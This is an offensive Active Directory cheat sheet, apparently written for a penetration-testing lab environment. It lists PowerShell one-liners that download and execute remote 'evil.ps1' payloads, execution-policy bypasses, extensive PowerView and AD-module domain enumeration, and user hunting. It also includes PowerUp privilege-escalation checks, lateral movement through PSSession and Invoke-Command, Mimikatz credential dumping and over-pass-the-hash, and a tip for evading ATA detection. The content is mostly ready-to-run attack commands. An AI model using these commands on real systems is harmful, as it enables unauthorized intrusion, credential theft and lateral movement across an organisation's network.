# Cheat Sheet ## General ``` ### Shows a brief help about the cmdlet or topic Get-Help Get-Help Get-Help * Get-Help process Get-Help Get-Item -Full Get-Help Get-Item -Examples ### Listing all cmdlets Get-Command -CommandType cmdlet ### View privileges whoami /privs ### View name of host hostname ### Load PowerView . .\PowerView.ps1 ### Load Module AD Import-Module .\Microsoft.ActiveDirectory.Management.dll Import-Module .\ActiveDirectory\ActiveDirectory.psd1 ``` ## PowerShell Script Execution ``` iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1') $ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1') $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText $wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd( ``` ## Execution Policy ### PowerShell ``` # Execution Policy ### Several ways to bypass powershell -ExecutionPolicy bypass powershell -c <cmd> powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass" ``` ## Import Modules ### PowerShell ``` # Import Modules ### A module can be imported with: Import-Module <modulepath> ### All the commands in a module can be listed with: Get-Command -Module <modulename> ``` ## Domain Enumeration ### Using NET classes ``` # Domain ### Get Current Domain $ADClass = [System.DirectoryServices.ActiveDirectory.Domain] $ADClass::GetCurrentDomain() ``` ### Using Powerview ``` # Domain ### Get current domain Get-NetDomain ### Get object of another domain Get-NetDomain -Domain <domain> Get-NetDomain -Domain moneycorp.local ### Get domain SID for the current domain Get-DomainSID ### Get domain policy for the current domain Get-DomainPolicy (Get-DomainPolicy)."system access" (Get-DomainPolicy)."kerberos Policy" # Domain Controller ### Get domain controllers for the current domain Get-NetDomainController ### Get domain controllers for another domain Get-NetDomainController -Domain <domain> Get-NetDomainController -Domain moneycorp.local # Users ### Get a list of users in the current domain Get-NetUser Get-NetUser | select cn Get-NetUser | select samaccountname Get-NetUser -Username student1 ### Get list of all properties for users in the current domain Get-UserProperty Get-UserProperty -Properties pwdlastset Get-UserProperty -Properties logoncount Get-UserProperty -Properties badpwdcount ### Search for a particular string in a user's attributes Find-UserField -Verbose Find-UserField -SearchField Description -SearchTerm "pass" Find-UserField -SearchField Description -SearchTerm "built" # Computers ### Get a list of computers in the current domain Get-NetComputer Get-NetComputer -OperatingSystem "*Server 2016*" Get-NetComputer -FullData Get-NetComputer -FullData | select operatingsystem Get-NetComputer -Ping # Domain Groups ### Get all the groups in the current domain Get-NetGroup Get-NetGroup -Domain <targetdomain> Get-NetGroup -FullData Get-NetGroup 'Domain Admins' -FullData ### Get all groups containing the word "admin" in group name Get-NetGroup -GroupName 'Domain Admins' Get-NetGroup -GroupName 'Domain Admins' -FullData Get-NetGroup -GroupName *admin* Get-NetGroup -GroupName *admin* -Domain moneycorp.local ### Get all the members of the Domain Admins group Get-NetGroupMember -GroupName 'Domain Admins' Get-NetGroupMember -GroupName "Domain Admins" -Recurse Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local ### Get the group membership for a user Get-NetGroup -UserName "student1" # Local Groups Requisites:Administrator privs on non-dc machines ### List all the local groups on a machine Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups ### Get members of all the local groups on a machine Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse # Logged users Requisites:Needs local admin rights on the target ### Get actively logged users on a computer Get-NetLoggedon -ComputerName <servername> ### Get locally logged users on a computer Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local ### Get the last logged users on a computer Get-LastLoggedon -ComputerName <servername> # Files ### Find shares on hosts in current domain Invoke-ShareFinder -Verbose Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC ### Find sensitive files on computers in the domain Invoke-FileFinder -Verbose ### Get all fileservers of the domain Get-NetFileServer # GPO ### Get list of GPO in current domain Get-NetGPO Get-NetGPO | select displayname ### Get list of GPO in current host Get-NetGPO -Computer dcorp-stdadmin.dollarcorp.moneycorp.local hostname : dcorp-stdadmin ### Get GPO(s) which use Restricted Groups or groups.xml for interesting users Get-NetGPOGroup # Users, local groups and GPO ### Get users which are in a local group of a machine using GPO Find-GPOComputerAdmin -Computername dcorp-student1.dollarcorp.moneycorp.local ### Get machines where the given user is member of a specific group Find-GPOLocation -UserName student1 -Verbose # OU ### Get OUs in a domain Get-NetOU Get-NetOU -FullData ### Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU Get-NetGPO Get-NetGPO -GPOname '{F22SASD-ASD4-486E-A657-96SC65S6A}' # ACL ### Get the ACLs associated with the specified object Get-ObjectAcL -SamAccountName student1 -ResolveGUIDs ### Get the ACLs associated with the specified prefix to be used for search Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose ### Get the ACLs associated with the specified LDAP path to be used for search Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose ### Search for interesting ACEs Invoke-ACLScanner -ResolveGUIDs ### Get the ACLs associated with the specified path Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol" # Trusts ### Get a list of all domain trusts for the current domain Get-NetDomainTrust Get-NetDomainTrust -Domain us.dollarcorp.moneycorp.local # Forest ### Get details about the current forest Get-NetForest Get-NetForest -Forest eurocorp.local ### Get all domains in the current forest Get-NetForestDomain Get-NetForestDomain -Forest eurocorp.local ### Get all global catalogs for the current forest Get-NetForestCatalog Get-NetForestCatalog -Forest eurocorp.local ### Map trusts of a forest Get-NetForestTrust Get-NetForestTrust -Forest eurocorp.local ``` ### Using Module AD ``` #Domain ### Get current domain Get-ADDomain ### Get object of another domain Get-ADDomain -Identity <domain> Get-ADDomain -Identity moneycorp.local ### Get domain SID for the current domain (Get-ADDomain).DomainSID # Domain Controller ### Get domain controllers for the current domain Get-ADDomainController ### Get domain controllers for another domain Get-ADDomainController -DomainName moneycorp.local -Discover Get-ADDomainController -DomainName <domain> -Discover #Users ### Get a list of users in the current domain Get-ADUser -Filter * -Properties * Get-ADUser -Filter * -Properties * | select Name Get-ADUser -Identity student1 Get-ADUser -Identity student1 -Properties * ### Get list of all properties for users in the current domain Get-ADUser -Filter * -Properties * | select -First | Get-Member - MemberType *Property | select Name Get-ADUser -Filter * -Properties * | select name,@{expression {[datetime]::fromFileTime($_.pwdlastset)}} ### Search for a particular string in a user's attributes Get-ADUser -Filter 'Description -like "*built*"' - Properties Description | select name,Description # Computers ### Get a list of computers in the current domain Get-ADComputer -Filter * Get-ADComputer -Filter * | select Name Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName} Get-ADComputer -Filter * -Properties * # Groups ### Get all the groups in the current domain Get-ADGroup -Filter * | select Name Get-ADGroup -Filter * -Properties * ### Get all groups containing the word "admin" in group name Get-ADGroup -Filter 'Name -like "\*admin\*"' | select Name ### Get all the members of the Domain Admins group Get-ADGroupMember -Indetity "Domain Admins" -Recursive ### Get the group membership for a user Get-ADPrincipalGroupMembership -Identity student1 Get-ADPrincipalGroupMembership -Identity studentadmin # GPO ### Get list of GPO in current domain Get-GPO -All (GroupPolicy module) Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html (Provides RSoP) # OU ### Get OUs in a domain Get-ADOrganizationalUnit -Filter * -Properties * ### Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU Get-GPO -Guid F22SASD-ASD4-486E-A657-96SC65S6A (GroupPolicy module) # ACL ### Enumerate ACLs without resolving GUIDs (Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access # Trusts ### Get a list of all domain trusts for the current domain Get-ADTrust Get-ADTrust -Identity us.dollarcorp.moneycorp.local # Forest ### Get details about the current forest Get-ADForest Get-ADForest -Identity eurocorp.local ### Get all domains in the current forest (Get-ADForest).Domains ### Get all global catalogs for the current forest Get-ADForest | select -ExpandProperty GlobalCatalogs ### Map trusts of a forest Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"' ``` ### BloodHound ``` ### Collection All C:\AD\Tools\BloodHound-master\Ingestors\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Verbose ### To avoid detections like ATA Invoke-BloodHound -CollectionMethod All -ExcludeDC ``` ## User Hunting ### Using PowerView ``` # Local Admin Access ### Find all machines on the current domain where the current user has local admin access Find-LocalAdminAccess -Verbose ### This function queries the DC of the current or provided domain for a list of computers(Get-NetComputer) and the use multi-threaded Invoke-CheckLocalAdminAccess on each machine. ### Find local admins on all machines of the domain(needs administrator privs on non-dc machines) Invoke-EnumerateLocalAdmin -Verbose ### This function queries the DC of the current or provided domain for a list of computers(Get-NetComputer) and the use multi-threaded Get-NetLocalGroup on each machine. # Sessions ### Find computers where a domain admin (or specified user/group) has sessions Invoke-UsersHunter Invoke-UsersHunter - GroupName "RPDUsers" ### This function queries the DC of the current or provided domain for members of the given group(Domain Admins by default) using Get-NetGroupMember, gets a list of computers (Get-NetComputer) and list sessions and logged on users (Get-NetSession/Get-NetLoggedon) from each machine. ### To confirm admin access Invoke-UserHunter -CheckAccess Invoke-UserHunter -Verbose # Logged-in ### Find computers where a domain admin is logged-in Invoke-UserHunter -Stealth ### This option queries the DC of the current or provided domain for members of the given group(Domain Admins by default) using Get-NetGroupMember, gets a list_only_of high traffic servers(DC, File Servers and Distributed File Servers) for less traffic generation and list sessions and logged on users (Get-NetSession/Get-NetLoggedon) from each machine Get-NetSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local ``` ### Aditional ``` # Hardening ### Changes permissions on the NetSessionEnum .\NetCease.ps1 Restart-Service -Name Server -Force .\NetCease.ps1 -Revert ``` ## Privilege Escalation - Local ### Using PowerUp ``` Requisites StartName: LocalSystem CanRestart: True ### Get services with unquoted paths and a space in their name Get-ServiceUnquoted -Verbose ### Get services where the current user can write to its binary path or change arguments to the binary Get-ModifiableServiceFile -Verbose ### Get the services whose configuration current user can modify Get-ModifiableService -Verbose ### Check Attacks Invoke-Allchecks ``` ### In Jenkins ``` ### Con privilegios de Administrador ### Con la capacidad de configurar compilaciones ``` ### Aditional ``` # Configuration ### beRoot .\beRoot.exe ### Privesc . .\privesc.ps1 Invoke-Privesc ``` ## Lateral Movement ``` # PSSession ### Method1 Enter-PSSession -ComputerName <computer> Requisites: Administrator privs in dcorp-adminsrv Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local ### Method2 $sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local Enter-PSSession -Session $sess # Commands ### Use below to execute commands or scriptblocks Invoke-Command -ScripBlock{whoami;hostname} -ComputerName(Get-Content <list_of_servers>) Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScripBlock{whoami;hostname} ### Use below to execute scripts from files Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps -ComputerName (Get-Content <list_of_servers>) Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath C:\AD\Tools\PowerUp.ps1 ### Use below to execute locally loaded function on the remote machines Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock ${function:hello} ### In this case, we are passing Arguments. Keep in mind that only positional arguments could be passed this away: Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList ### In below, a function call within the script is used Invoke-Command -Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>) ### Aditional Invoke-Command -FilePath C:\AD\Tools\hello.ps1 -Session $sess Enter-PSSession -Session $sess ### Use below to execute "Stateful" commands using Invoke-Command: $Sess = New-PSSession -Computername Server1 Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process} Invoke-Command -Session $Sess -ScriptBlock {$Proc Name} # Invoke-Mimikatz ### Dump credentials on a local machine Invoke-Mimikatz -DumpCreds ### Dump credentials on multiple remote machines Invoke-Mimikatz -DumpCreds -ComputerName @("sys1" "sys2") ### Invoke-Mimikatz uses PowerShell remoting cmdlet Invoke-Command to do above ### "Over pass the hash" generate tokens from hashes Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"' # Aditional ### Language Mode $ExecutionContext.SessionState.LanguageMode Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock{$ExecutionContext.SessionState.LanguageMode} ```